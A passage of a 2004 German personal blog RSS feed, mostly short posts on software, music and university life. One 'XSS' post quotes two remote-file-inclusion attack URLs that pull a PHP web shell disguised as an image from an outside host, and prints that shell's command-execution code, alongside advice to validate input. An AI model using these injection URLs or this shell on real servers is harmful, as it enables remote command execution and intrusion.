  10507.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  10508.    <description><![CDATA[<p>Auf <a href="https://web.archive.org/web/20040930055127/https://www.phppatterns.com/" title=":: phpPatterns()">phpPatterns()</a> findet man viele Artikel zu Patterns und Objektorientierter Programmierung.</p><p>Wer mit Mozilla unterwegs ist, kann dort auch den XUL Viewer ausprobieren.</p>
  10509. ]]></description>
  10510.    <content:encoded><![CDATA[<p>Auf <a href="https://web.archive.org/web/20040930055127/https://www.phppatterns.com/" title=":: phpPatterns()">phpPatterns()</a> findet man viele Artikel zu Patterns und Objektorientierter Programmierung.</p><p>Wer mit Mozilla unterwegs ist, kann dort auch den XUL Viewer ausprobieren.</p>
  10511. ]]></content:encoded>
  10512.  </item>
  10513.  
  10514.  <item>
  10515.    <title>Vim 6.3</title>
  10516.    <link>https://blog.x-way.org/Linux/2004/06/09/Vim_6_3.html</link>
  10517.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324038</guid>
  10518.    <dc:creator>Andreas Jaggi</dc:creator>
  10519.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10520.    <pubDate>Wed, 09 Jun 2004 21:23:35 +0000</pubDate>
  10521.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  10522.    <description><![CDATA[<p>Von <a href="http://www.vim.org/" title="vim.org"><abbr title="Vi IMproved">Vim</abbr></a> ist <a href="http://groups.yahoo.com/group/vimannounce/message/130" title="vimannounce">Version 6.3 erschienen.</a></p><p>Via <a href="http://theflow.de/" title="theflow.de">theflow</a></p>
  10523. ]]></description>
  10524.    <content:encoded><![CDATA[<p>Von <a href="http://www.vim.org/" title="vim.org"><abbr title="Vi IMproved">Vim</abbr></a> ist <a href="http://groups.yahoo.com/group/vimannounce/message/130" title="vimannounce">Version 6.3 erschienen.</a></p><p>Via <a href="http://theflow.de/" title="theflow.de">theflow</a></p>
  10525. ]]></content:encoded>
  10526.  </item>
  10527.  
  10528.  <item>
  10529.    <title>Money, Money, Money</title>
  10530.    <link>https://blog.x-way.org/Linux/2004/06/09/Money_Money_Money.html</link>
  10531.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324037</guid>
  10532.    <dc:creator>Andreas Jaggi</dc:creator>
  10533.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10534.    <pubDate>Wed, 09 Jun 2004 20:40:01 +0000</pubDate>
  10535.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  10536.    <description><![CDATA[<p>Seit ein paar Monaten, benutze ich <a href="http://www.gnucash.org/" title="GnuCash - Open Source Accounting Software" lang="en" xml:lang="en">GnuCash</a> um mein "Vermögen" zu verwalten.</p><p>GnuCash wurde in erster Linie für Privatanwender und <abbr title="Kleine und mittlere Unternehmen">KMU</abbr>s entwickelt und bringt entsprechende Features mit:</p><ul><li>Doppelte Buchhaltung mit allem was dazugehört: Journal, Tansaktionen etc.</li><li>OFX Import (was leider in der Schweiz von keiner Bank angeboten wird)</li><li>HBCI-Untersützung (welche bisher vor allem in Deutschland angeboten wird)</li><li>QIF-Unterstützung</li><li>Generierung von Berichten</li><li>Aktienkurse aus dem Internet</li><li>Devisenkurse aus dem Internet</li><li>Handling von Aktien- und Fonds Portfolios</li><li>Kunden- und Lieferanten Verwaltung</li><li>Rechnungsverwaltung</li><li>Steuerverwaltung</li><li>Fristenverwaltung</li></ul>
  10537. ]]></description>
  10538.    <content:encoded><![CDATA[<p>Seit ein paar Monaten, benutze ich <a href="http://www.gnucash.org/" title="GnuCash - Open Source Accounting Software" lang="en" xml:lang="en">GnuCash</a> um mein "Vermögen" zu verwalten.</p><p>GnuCash wurde in erster Linie für Privatanwender und <abbr title="Kleine und mittlere Unternehmen">KMU</abbr>s entwickelt und bringt entsprechende Features mit:</p><ul><li>Doppelte Buchhaltung mit allem was dazugehört: Journal, Tansaktionen etc.</li><li>OFX Import (was leider in der Schweiz von keiner Bank angeboten wird)</li><li>HBCI-Untersützung (welche bisher vor allem in Deutschland angeboten wird)</li><li>QIF-Unterstützung</li><li>Generierung von Berichten</li><li>Aktienkurse aus dem Internet</li><li>Devisenkurse aus dem Internet</li><li>Handling von Aktien- und Fonds Portfolios</li><li>Kunden- und Lieferanten Verwaltung</li><li>Rechnungsverwaltung</li><li>Steuerverwaltung</li><li>Fristenverwaltung</li></ul>
  10539. ]]></content:encoded>
  10540.  </item>
  10541.  
  10542.  <item>
  10543.    <title>XSS</title>
  10544.    <link>https://blog.x-way.org/Coding/2004/05/16/XSS.html</link>
  10545.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324036</guid>
  10546.    <dc:creator>Andreas Jaggi</dc:creator>
  10547.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10548.    <pubDate>Sun, 16 May 2004 15:00:12 +0000</pubDate>
  10549.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  10550.    <description><![CDATA[<pre>http://waterwave.ch/weblog/detail.php?label=http://cliente.escelsanet.com.br/metallz/cmd.jpg?&amp;cmd=ls%20/;uname%20-a;w
  10551. http://waterwave.ch/weblog/index.php?cat=http://cliente.escelsanet.com.br/metallz/cmd.jpg?&amp;cmd=ls%20/;uname%20-a;w</pre><p>Na, billige <a href="https://web.archive.org/web/20040315034807/http://linuxtag.bankhacker.de/websicherheit.html" title="Cross Site Scripting">XSS-Attacke</a> falsch angewendet.</p><p>In http://cliente.escelsanet.com.br/metallz/cmd.jpg steht übrigens dieser PHP-Code.</p><pre>&lt;/center&gt;&lt;font size=&quot;2&quot;&gt;&lt;pre&gt;-
  10552. &lt;?
  10553.  if (isset($chdir)) @chdir($chdir);
  10554.  ob_start();
  10555.  system(&quot;$cmd 1&gt; /tmp/cmdtemp 2&gt;&amp;1; cat /tmp/cmdtemp; rm /tmp/cmdtemp&quot;);
  10556.  $output = ob_get_contents();
  10557.  ob_end_clean();
  10558.  if (!empty($output)) echo str_replace(&quot;&gt;&quot;, &quot;&amp;gt;&quot;, str_replace(&quot;&lt;&quot;, &quot;&amp;lt;&quot;, $output));
  10559. ?&gt;</pre><p>Merke: Immer alle nicht vertrauenswürdigen Input-Daten (e.g. alle per POST, GET, COOKIE übermittelten Daten) kontrollieren. Sehr oft werden hierzu <a href="http://ch.php.net/manual/de/ref.ctype.php" title="Character type functions - Manual">Character type functions</a> eingesetzt.</p>
  10560. ]]></description>
  10561.    <content:encoded><![CDATA[<pre>http://waterwave.ch/weblog/detail.php?label=http://cliente.escelsanet.com.br/metallz/cmd.jpg?&amp;cmd=ls%20/;uname%20-a;w
  10562. http://waterwave.ch/weblog/index.php?cat=http://cliente.escelsanet.com.br/metallz/cmd.jpg?&amp;cmd=ls%20/;uname%20-a;w</pre><p>Na, billige <a href="https://web.archive.org/web/20040315034807/http://linuxtag.bankhacker.de/websicherheit.html" title="Cross Site Scripting">XSS-Attacke</a> falsch angewendet.</p><p>In http://cliente.escelsanet.com.br/metallz/cmd.jpg steht übrigens dieser PHP-Code.</p><pre>&lt;/center&gt;&lt;font size=&quot;2&quot;&gt;&lt;pre&gt;-
  10563. &lt;?
  10564.  if (isset($chdir)) @chdir($chdir);
  10565.  ob_start();
  10566.  system(&quot;$cmd 1&gt; /tmp/cmdtemp 2&gt;&amp;1; cat /tmp/cmdtemp; rm /tmp/cmdtemp&quot;);
  10567.  $output = ob_get_contents();
  10568.  ob_end_clean();
  10569.  if (!empty($output)) echo str_replace(&quot;&gt;&quot;, &quot;&amp;gt;&quot;, str_replace(&quot;&lt;&quot;, &quot;&amp;lt;&quot;, $output));
  10570. ?&gt;</pre><p>Merke: Immer alle nicht vertrauenswürdigen Input-Daten (e.g. alle per POST, GET, COOKIE übermittelten Daten) kontrollieren. Sehr oft werden hierzu <a href="http://ch.php.net/manual/de/ref.ctype.php" title="Character type functions - Manual">Character type functions</a> eingesetzt.</p>
  10571. ]]></content:encoded>
  10572.  </item>
  10573.  
  10574.  <item>
  10575.    <title>Dillo mit Tabs</title>
  10576.    <link>https://blog.x-way.org/Linux/2004/05/16/Dillo_mit_Tabs.html</link>
  10577.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324035</guid>
  10578.    <dc:creator>Andreas Jaggi</dc:creator>
  10579.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10580.    <pubDate>Sun, 16 May 2004 14:20:11 +0000</pubDate>
  10581.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  10582.    <description><![CDATA[<p>Wie ich nach einem Update erfreut festgestellt habe, kann <a href="https://web.archive.org/web/20040524140747/http://www.dillo.org/" lang="en" title="Dillo Web Browser (archive.org)">Dillo</a> jetzt auch mit Tabs umgehen.</p><img src="https://blog.x-way.org/images/dillo-new-tab.gif" alt="Screenshot, Dillo - Open in New Tab">
  10583. ]]></description>
  10584.    <content:encoded><![CDATA[<p>Wie ich nach einem Update erfreut festgestellt habe, kann <a href="https://web.archive.org/web/20040524140747/http://www.dillo.org/" lang="en" title="Dillo Web Browser (archive.org)">Dillo</a> jetzt auch mit Tabs umgehen.</p><img src="https://blog.x-way.org/images/dillo-new-tab.gif" alt="Screenshot, Dillo - Open in New Tab">
  10585. ]]></content:encoded>
  10586.  </item>
  10587.  
  10588.  <item>
  10589.    <title>Balélec 2004</title>
  10590.    <link>https://blog.x-way.org/Music/2004/05/16/Balelec_2004.html</link>
  10591.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324034</guid>
  10592.    <dc:creator>Andreas Jaggi</dc:creator>
  10593.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10594.    <pubDate>Sun, 16 May 2004 12:36:21 +0000</pubDate>
  10595.    <category domain="https://blog.x-way.org/Music">Music</category>
  10596.    <description><![CDATA[<p>Le vendredi j'étais au <a href="https://web.archive.org/web/20040613173349/http://www.balelec.ch/balelec04/" title="Balélec 2004 (archive.org)" lang="fr">Balélec</a> et c'était vachement cool. 30 groupes sur 7 scènes pour 20 Francs, cela on ne trouve pas ailleurs.</p><p>On se voit l'année prochaine, au 25-ième Balélec!</p>
  10597. ]]></description>
  10598.    <content:encoded><![CDATA[<p>Le vendredi j'étais au <a href="https://web.archive.org/web/20040613173349/http://www.balelec.ch/balelec04/" title="Balélec 2004 (archive.org)" lang="fr">Balélec</a> et c'était vachement cool. 30 groupes sur 7 scènes pour 20 Francs, cela on ne trouve pas ailleurs.</p><p>On se voit l'année prochaine, au 25-ième Balélec!</p>
  10599. ]]></content:encoded>
  10600.  </item>
  10601.  
  10602.  <item>
  10603.    <title>v2.04b</title>
  10604.    <link>https://blog.x-way.org/Misc/2004/05/12/v2_04b.html</link>
  10605.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324033</guid>
  10606.    <dc:creator>Andreas Jaggi</dc:creator>
  10607.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10608.    <pubDate>Wed, 12 May 2004 16:31:00 +0000</pubDate>
  10609.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  10610.    <description><![CDATA[Neue Features:<ul><li>Kommentarvorschau</li><li>On-the-fly Sprachwechsel der Navigationselemente (Deutsch/Französisch)</li></ul>
  10611. ]]></description>
  10612.    <content:encoded><![CDATA[Neue Features:<ul><li>Kommentarvorschau</li><li>On-the-fly Sprachwechsel der Navigationselemente (Deutsch/Französisch)</li></ul>
  10613. ]]></content:encoded>
  10614.  </item>
  10615.  
  10616.  <item>
  10617.    <title>Bouton Satellite</title>
  10618.    <link>https://blog.x-way.org/Music/2004/05/08/Bouton_Satellite.html</link>
  10619.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324032</guid>
  10620.    <dc:creator>Andreas Jaggi</dc:creator>
  10621.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10622.    <pubDate>Sat, 08 May 2004 16:55:00 +0000</pubDate>
  10623.    <category domain="https://blog.x-way.org/Music">Music</category>
  10624.    <description><![CDATA[<p><a href="http://www.gtmcknight.com/buttons/">Là</a> il y a 2170 boutons, mais aucun du <a href="http://satwww.epfl.ch">Satellite</a>. Donc j'ai crée moi-même un bouton pour le Satellite.</p><p><a href="http://satwww.epfl.ch" title="Satellite - Bar, Concerts, Cafés-Théâtres"><img src="https://blog.x-way.org/images/satellite.png" alt="Satellite - Bar, Concerts, Cafés-Théâtres" style="border: 0px;"></a></p>
  10625. ]]></description>
  10626.    <content:encoded><![CDATA[<p><a href="http://www.gtmcknight.com/buttons/">Là</a> il y a 2170 boutons, mais aucun du <a href="http://satwww.epfl.ch">Satellite</a>. Donc j'ai crée moi-même un bouton pour le Satellite.</p><p><a href="http://satwww.epfl.ch" title="Satellite - Bar, Concerts, Cafés-Théâtres"><img src="https://blog.x-way.org/images/satellite.png" alt="Satellite - Bar, Concerts, Cafés-Théâtres" style="border: 0px;"></a></p>
  10627. ]]></content:encoded>
  10628.  </item>
  10629.  
  10630.  <item>
  10631.    <title>CVS</title>
  10632.    <link>https://blog.x-way.org/Linux/2004/05/08/CVS.html</link>
  10633.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324031</guid>
  10634.    <dc:creator>Andreas Jaggi</dc:creator>
  10635.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10636.    <pubDate>Sat, 08 May 2004 14:00:00 +0000</pubDate>
  10637.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  10638.    <description><![CDATA[<p>Momentan machen wir im <a href="https://web.archive.org/web/20041015150245/http://cowww.epfl.ch/proginfo/" title="Cours de programmation II (archive.org)">Programmieren</a> ein Projekt in Zweierteams. Um die ganze Codehandhabung zu vereinfachen, hat sich unser Team entschieden, <a href="http://www.nongnu.org/cvs/" title="Concurrent Versions System">CVS</a> einzusetzen. CVS bietet eine zentrale Codeverwaltung mit Versions- und Konfliktsmanagement.</p><p>Da ich als CVS-Neuling das CLI-Interface nur grundlegend kenne, habe ich mich nach einem GUI-Interface umgeschaut. Dabei habe ich zwei überzeugende Programme gefunden: <a href="https://tkcvs.sourceforge.io/" title="TkCVS">TkCVS</a> und <a href="https://sourceforge.net/projects/lincvs/" title="LinCVS">LinCVS</a>, das auch auf Windows portiert wurde.</p>
  10639. ]]></description>
  10640.    <content:encoded><![CDATA[<p>Momentan machen wir im <a href="https://web.archive.org/web/20041015150245/http://cowww.epfl.ch/proginfo/" title="Cours de programmation II (archive.org)">Programmieren</a> ein Projekt in Zweierteams. Um die ganze Codehandhabung zu vereinfachen, hat sich unser Team entschieden, <a href="http://www.nongnu.org/cvs/" title="Concurrent Versions System">CVS</a> einzusetzen. CVS bietet eine zentrale Codeverwaltung mit Versions- und Konfliktsmanagement.</p><p>Da ich als CVS-Neuling das CLI-Interface nur grundlegend kenne, habe ich mich nach einem GUI-Interface umgeschaut. Dabei habe ich zwei überzeugende Programme gefunden: <a href="https://tkcvs.sourceforge.io/" title="TkCVS">TkCVS</a> und <a href="https://sourceforge.net/projects/lincvs/" title="LinCVS">LinCVS</a>, das auch auf Windows portiert wurde.</p>
  10641. ]]></content:encoded>
  10642.  </item>
  10643.  
  10644.  <item>
  10645.    <title>Deadlock</title>
  10646.    <link>https://blog.x-way.org/Misc/2004/05/02/Deadlock.html</link>
  10647.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324030</guid>
  10648.    <dc:creator>Andreas Jaggi</dc:creator>
  10649.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10650.    <pubDate>Sun, 02 May 2004 01:32:32 +0000</pubDate>
  10651.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  10652.    <description><![CDATA[Am Freitag feierte die <a href="http://sin.epfl.ch" title="Section d'Informatique" lang="fr">Section d'Informatique</a> ihr 20-jähriges Bestehen.<br>
  10653. Zuerst mussten 90 Minuten Reden diverser Professoren und ehemaliger Präsidenten der <a href="http://www.epfl.ch" title="Ecole Polytechnique Fédérale de Lausanne">EPFL</a> überstanden werden. Da jeder Redner noch ein bisschen in der Vergangenheit schweifte, wurden aus den 90 Minuten 2 Stunden. Aber danach gabs ein Apéro mit einem fünfgängigen Menu.<br>
  10654. Nachdem der offizielle Teil gebührend genossen war, gings ab zum <a href="https://web.archive.org/web/20040507164952/http://www.deadlock.ch/" title="Deadlock 04 &amp; fete SSP (archive.org)">Deadlock</a>. Da die Section d'Informatique einen Frauenanteil von 6% hat, wurde das Deadlock mit dem Fest der Sciences Sociales et Politiques der <a href="http://www.unil.ch/" title="Université de Lausanne">UNIL</a> (95% Frauenanteil) zusammengelegt :-)<br>
  10655. So konnte der Rest des Abends einfach nur gut werden. Doch um 3 Uhr morgens waren auch die sechs Konzerte zuende und ich durfte noch fast ne Stunde nach Hause radeln...
  10656.  
  10657. ]]></description>
  10658.    <content:encoded><![CDATA[Am Freitag feierte die <a href="http://sin.epfl.ch" title="Section d'Informatique" lang="fr">Section d'Informatique</a> ihr 20-jähriges Bestehen.<br>
  10659. Zuerst mussten 90 Minuten Reden diverser Professoren und ehemaliger Präsidenten der <a href="http://www.epfl.ch" title="Ecole Polytechnique Fédérale de Lausanne">EPFL</a> überstanden werden. Da jeder Redner noch ein bisschen in der Vergangenheit schweifte, wurden aus den 90 Minuten 2 Stunden. Aber danach gabs ein Apéro mit einem fünfgängigen Menu.<br>
  10660. Nachdem der offizielle Teil gebührend genossen war, gings ab zum <a href="https://web.archive.org/web/20040507164952/http://www.deadlock.ch/" title="Deadlock 04 &amp; fete SSP (archive.org)">Deadlock</a>. Da die Section d'Informatique einen Frauenanteil von 6% hat, wurde das Deadlock mit dem Fest der Sciences Sociales et Politiques der <a href="http://www.unil.ch/" title="Université de Lausanne">UNIL</a> (95% Frauenanteil) zusammengelegt :-)<br>
  10661. So konnte der Rest des Abends einfach nur gut werden. Doch um 3 Uhr morgens waren auch die sechs Konzerte zuende und ich durfte noch fast ne Stunde nach Hause radeln...
  10662.  
  10663. ]]></content:encoded>
  10664.  </item>
  10665.  
  10666.  <item>
  10667.    <title>CH7</title>
  10668.    <link>https://blog.x-way.org/Cinema/2004/04/25/CH7.html</link>
  10669.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324029</guid>
  10670.    <dc:creator>Andreas Jaggi</dc:creator>
  10671.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10672.    <pubDate>Sun, 25 Apr 2004 12:47:09 +0000</pubDate>
  10673.    <category domain="https://blog.x-way.org/Cinema">Cinema</category>
  10674.    <description><![CDATA[<p><a href="http://www.ch7.ch/" title="CH7 - online">CH7</a> ist ein neuer Schweizer Fim, der nach dem "No Budget but high Quality" Prinzip produziert worden ist. Sämtliche Arbeit wurde ehrenatmlich geleistet und Sponsoren haben die Produktion unterstützt.</p><p>Die Macherinnen und Macher von CH7 wollen zu der heute grassierenden Copyright-Hysterie einen Gegenpol bilden. Deshalb ist kann man CH7 seit dem 24.04.04 im Internet frei <a href="http://www.ch7.ch/download.html" title="CH7 - Download">herunterladen</a> und straffrei kopieren. Diese Vertriebsart ist einmalig und neu. CH7 untersteht der <a href="http://creativecommons.org/licenses/by-nd-nc/1.0/" title="Creative Commons Deed">Creative Commons License</a>. Feel free to share!</p><p>Wer das Projekt unterstützen oder einfach nur danken möchte kann dies unter folgender Bankverbindung:<br><strong>CREDIT SUISSE<br>Clearing Nr. 4595<br>Konto 917917-90 Yvan Piccinno<br>Vermerk: CH7 Download</strong></p>
  10675. ]]></description>
  10676.    <content:encoded><![CDATA[<p><a href="http://www.ch7.ch/" title="CH7 - online">CH7</a> ist ein neuer Schweizer Fim, der nach dem "No Budget but high Quality" Prinzip produziert worden ist. Sämtliche Arbeit wurde ehrenatmlich geleistet und Sponsoren haben die Produktion unterstützt.</p><p>Die Macherinnen und Macher von CH7 wollen zu der heute grassierenden Copyright-Hysterie einen Gegenpol bilden. Deshalb ist kann man CH7 seit dem 24.04.04 im Internet frei <a href="http://www.ch7.ch/download.html" title="CH7 - Download">herunterladen</a> und straffrei kopieren. Diese Vertriebsart ist einmalig und neu. CH7 untersteht der <a href="http://creativecommons.org/licenses/by-nd-nc/1.0/" title="Creative Commons Deed">Creative Commons License</a>. Feel free to share!</p><p>Wer das Projekt unterstützen oder einfach nur danken möchte kann dies unter folgender Bankverbindung:<br><strong>CREDIT SUISSE<br>Clearing Nr. 4595<br>Konto 917917-90 Yvan Piccinno<br>Vermerk: CH7 Download</strong></p>
  10677. ]]></content:encoded>
  10678.  </item>
  10679.  
  10680.  <item>
  10681.    <title>Sysmic 10</title>
  10682.    <link>https://blog.x-way.org/Misc/2004/04/21/Sysmic_10.html</link>
  10683.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324028</guid>
  10684.    <dc:creator>Andreas Jaggi</dc:creator>
  10685.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10686.    <pubDate>Wed, 21 Apr 2004 21:01:45 +0000</pubDate>
  10687.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  10688.    <description><![CDATA[Nun findet man bei den Einstellungen ein neues Layout, das dem Flyer vom <a href="https://web.archive.org/web/20040604014341/http://sysmic.epfl.ch/" title="Sysmic 10 (archive.org)">Sysmic</a> nachempfunden ist.
  10689. ]]></description>
  10690.    <content:encoded><![CDATA[Nun findet man bei den Einstellungen ein neues Layout, das dem Flyer vom <a href="https://web.archive.org/web/20040604014341/http://sysmic.epfl.ch/" title="Sysmic 10 (archive.org)">Sysmic</a> nachempfunden ist.
  10691. ]]></content:encoded>
  10692.  </item>
  10693.  
  10694.  <item>
  10695.    <title>Acronymizer</title>
  10696.    <link>https://blog.x-way.org/Coding/2004/04/15/Acronymizer.html</link>
  10697.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324027</guid>
  10698.    <dc:creator>Andreas Jaggi</dc:creator>
  10699.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10700.    <pubDate>Thu, 15 Apr 2004 19:35:22 +0000</pubDate>
  10701.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  10702.    <description><![CDATA[<p><a href="https://blog.x-way.org/stuff/acronymizer.txt" title="acronymizer.txt">Hier</a>  ist ein kleines Skript, welches in einem (X)HTML-Text nach Akronymen sucht und diese mit ihrer Definition ersetzt. Die Akronyme werden als assoziatives Array übergeben und können nicht nur die Definition sondern auch andere Attribute wie z.B. die Sprache mitbringen. Das Skript ersetzt nur Text ausserhalb von HTML-Tags und ersetzt keine Akronyme die schon mit dem entsprechenden Tag ausgerüstet sind.<br>Zusätzlich gibt es einen Anständigen Modus, in dem Akronyme nur ersetzt werden, wenn sie nicht in einem Wort integriert sind, sondern durch ein Zeichen davon getrennt sind. Die Trennzeichen werden auch als Parameter übergeben. So wird beispielsweise PHPprogrammierer im anständigen Modus nicht ersetzt, hingegen PHP-Programmierer schon.</p><p>Einfach mal anschauen, vielleicht kanns ja sonst noch jemand gebrauchen.</p>
  10703. ]]></description>
  10704.    <content:encoded><![CDATA[<p><a href="https://blog.x-way.org/stuff/acronymizer.txt" title="acronymizer.txt">Hier</a>  ist ein kleines Skript, welches in einem (X)HTML-Text nach Akronymen sucht und diese mit ihrer Definition ersetzt. Die Akronyme werden als assoziatives Array übergeben und können nicht nur die Definition sondern auch andere Attribute wie z.B. die Sprache mitbringen. Das Skript ersetzt nur Text ausserhalb von HTML-Tags und ersetzt keine Akronyme die schon mit dem entsprechenden Tag ausgerüstet sind.<br>Zusätzlich gibt es einen Anständigen Modus, in dem Akronyme nur ersetzt werden, wenn sie nicht in einem Wort integriert sind, sondern durch ein Zeichen davon getrennt sind. Die Trennzeichen werden auch als Parameter übergeben. So wird beispielsweise PHPprogrammierer im anständigen Modus nicht ersetzt, hingegen PHP-Programmierer schon.</p><p>Einfach mal anschauen, vielleicht kanns ja sonst noch jemand gebrauchen.</p>
  10705. ]]></content:encoded>
  10706.  </item>
  10707.  
  10708.  <item>
  10709.    <title>Playlist</title>
  10710.    <link>https://blog.x-way.org/Misc/2004/04/15/Playlist.html</link>
  10711.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324026</guid>
  10712.    <dc:creator>Andreas Jaggi</dc:creator>
  10713.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10714.    <pubDate>Thu, 15 Apr 2004 18:12:21 +0000</pubDate>
  10715.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  10716.    <description><![CDATA[<p><a href="http://kniebes.net/mk/" title="Markus Kniebes">Markus Kniebes</a> hat ein <a href="https://kniebes.com/2004/04/15/am-rande-der-sinnlosigkeit" title="Am Rande der Sinnlosigkeit">Skript</a> geschrieben, welches mittels einer MySQL-Datenbank eine Übersicht über die abgespielten Musikstücke erstellt. Erinnert mich ein bisschen an die Playlists in iTunes. Meine Playlist findet man <a href="http://waterwave.ch/weblog/playlist.php" title="Playlist">hier</a> :-)</p>
  10717. ]]></description>
  10718.    <content:encoded><![CDATA[<p><a href="http://kniebes.net/mk/" title="Markus Kniebes">Markus Kniebes</a> hat ein <a href="https://kniebes.com/2004/04/15/am-rande-der-sinnlosigkeit" title="Am Rande der Sinnlosigkeit">Skript</a> geschrieben, welches mittels einer MySQL-Datenbank eine Übersicht über die abgespielten Musikstücke erstellt. Erinnert mich ein bisschen an die Playlists in iTunes. Meine Playlist findet man <a href="http://waterwave.ch/weblog/playlist.php" title="Playlist">hier</a> :-)</p>
  10719. ]]></content:encoded>
  10720.  </item>
  10721.  
  10722.  <item>
  10723.    <title>Na</title>
  10724.    <link>https://blog.x-way.org/Misc/2004/04/15/Na.html</link>
  10725.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324025</guid>
  10726.    <dc:creator>Andreas Jaggi</dc:creator>
  10727.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10728.    <pubDate>Thu, 15 Apr 2004 17:16:41 +0000</pubDate>
  10729.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  10730.    <description><![CDATA[<ol><li>Grab the nearest book.</li><li>Open the book to page 23.</li><li>Find the fifth sentence.</li><li>Post the text of the sentence in your journal along with these instructions.</li></ol><blockquote lang="en"><p>In symbols, the average acceleration <em>a</em>, over a time interval <em>&#916;t</em> = <em>t<sub>2</sub></em> - <em>t<sub>1</sub></em> during which the velocity changes by <em>&#916;v</em> = <em>v<sub>2</sub></em> - <em>v<sub>1</sub></em>, is defined as<br><em>a</em> = <em>(v<sub>2</sub> - v<sub>1</sub>)</em>/<em>(t<sub>2</sub> - t<sub>1</sub>)</em> = <em>&#916;v</em>/<em>&#916;t</em>.</p><p>Douglas C. Giancoli - Physics for Scientists &amp; Engineers</p></blockquote><p>Via <a href="https://www.kniebes.com" title="Dunkle Zeiten">Dunkle Zeiten</a>.</p>
  10731. ]]></description>
  10732.    <content:encoded><![CDATA[<ol><li>Grab the nearest book.</li><li>Open the book to page 23.</li><li>Find the fifth sentence.</li><li>Post the text of the sentence in your journal along with these instructions.</li></ol><blockquote lang="en"><p>In symbols, the average acceleration <em>a</em>, over a time interval <em>&#916;t</em> = <em>t<sub>2</sub></em> - <em>t<sub>1</sub></em> during which the velocity changes by <em>&#916;v</em> = <em>v<sub>2</sub></em> - <em>v<sub>1</sub></em>, is defined as<br><em>a</em> = <em>(v<sub>2</sub> - v<sub>1</sub>)</em>/<em>(t<sub>2</sub> - t<sub>1</sub>)</em> = <em>&#916;v</em>/<em>&#916;t</em>.</p><p>Douglas C. Giancoli - Physics for Scientists &amp; Engineers</p></blockquote><p>Via <a href="https://www.kniebes.com" title="Dunkle Zeiten">Dunkle Zeiten</a>.</p>
  10733. ]]></content:encoded>
  10734.  </item>
  10735.  
  10736.  <item>
  10737.    <title>Mozilla Bug</title>
  10738.    <link>https://blog.x-way.org/Webdesign/2004/04/15/Mozilla_Bug.html</link>
  10739.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324024</guid>
  10740.    <dc:creator>Andreas Jaggi</dc:creator>
  10741.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10742.    <pubDate>Thu, 15 Apr 2004 01:55:52 +0000</pubDate>
  10743.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  10744.    <description><![CDATA[<img src="https://blog.x-way.org/images/mozilla-bug.png" width="132" height="198" alt="Screenshot vom Bug"><p>Wie ich <a href="http://www.serve.com/apg/" title="Andrew Porter Glendinning">Andrew Porter Glendinning</a> besuchte, entdeckte ich diesen Graphikfehler in Mozilla. Der Text lautet </p><blockquote lang="en"><p>If you can read this, your browser doesn't support the over 4-year-old <a href="https://www.w3.org/TR/REC-CSS2/">CSS Level 2 Recommendation</a>. These icons should be fixed in the lower right corner of your browser window, and this message should be invisible.</p></blockquote><p>Nach der Analyse des Stylesheets, habe ich herausgefunden, dass der Text eigentlich ausserhalb des Browserfensters dargestellt werden sollte. Bei Mozilla hört das Browserfenster vor dem Scrollbalken auf, jedoch für die Rendering-Engine erst am Fensterrand :-P</p>
  10745. ]]></description>
